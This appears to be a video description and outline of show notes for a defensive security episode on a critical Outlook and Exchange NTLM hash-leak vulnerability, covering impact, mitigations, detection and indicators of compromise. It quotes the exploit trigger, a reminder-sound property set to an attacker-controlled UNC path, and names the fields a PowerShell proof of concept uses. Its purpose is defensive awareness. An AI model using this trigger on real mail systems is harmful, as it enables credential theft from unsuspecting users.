This week we look at a "Critical Vulnerability" with a CVSS score of 9.8!!! This nasty flaw affects both the Microsoft Outlook Client and Exchange servers and could lead to full system compromise if not patched.
Buy Me A Coffee (or books/gear/etc 😁):
https://www.buymeacoffee.com/daniello...
========================
Episode Notes and Links
========================
What is the threat?
The Hacker News
https://thehackernews.com/2023/03/mic...
Attacker can steal Net-NTLMv2 hashes through email
*No user interaction necessary!*
Vulnerable Exchange Servers
2013
2016
2019
Vulnerable Outlook Client
Windows Outlook Client
No other clients affected
MacOS, Android, etc
Specially crafted messages
appointment
note
task
Embedded UNC path to Attacker-controlled SMB share
triggers NTLM authentication
Attacker then...
Capture hash
Replay hash
Exploit Technical Details
*MDSec*
https://www.mdsec.co.uk/2023/03/explo...
Details are sparse, but...
`PidLidReminderFileParameter = @"\\attacker-IP\bogus"`
Specifies sound client plays when reminder becomes overdue
`PidLidReminderOverride = true`
Makes sure the reminder sound is played when reminder becomes overdue
MDSec Nighthawk
RedTeam C2
$10k per/year license
minimum of 3 licenses! (still nice tech though!)
*TrustedSec*
https://www.trustedsec.com/blog/criti...
Powershell script
`-remotefilepath`
`ReminderSoundFile`
`ReminderOverrideDefault = 1`
`ReminderSet = 1`
`ReminderPlaysound = 1`
Active Exploitation
*DeepInstinct*
https://www.deepinstinct.com/blog/cve...
Attribution
Timeline of Attacks
Mitigation
TrustedSec
Block outbound SMB port 445 traffic
NTLM auth messages can't be sent out
Add users to Protected Users security group
Restricts NTLM from being used for auth
Detection
Microsoft Script
https://github.com/microsoft/CSS-Exch...
TrustedSec
Audit Registry Keys
Sigma Detection Rule
IoCs
DeepInstinct: Attacker Controlled IPs
Outlook-NTLMv2-Exploit.md
Displaying Outlook-NTLMv2-Exploit.md.
========================
Chapters
========================
00:00 Intro
00:45 Vulnerability Overview
03:38 Microsoft Advisory
06:50 NTLM Attack with Outlook
10:00 Exploit Technical Details
15:15 .NET PoC by mdsec.co.uk
18:25 NightHawk C2 Framework
20:26 PowerShell PoC by TrustedSec
22:40 Exploitation Timeline & Attribution
26:24 Mitigations
28:08 Detection
31:55 IoCs
32:40 Final Thoughts
33:18 P.S. - Microsoft Detection Script
=====================================
#cybersecurity #cti #cyberthreats #informationsecurity #cybersecurityawareness #microsoft #outlook #exchange #infosec #blueteam #threatintelligence #cyberthreatintelligence #security #hacker #hacking #ethicalhacking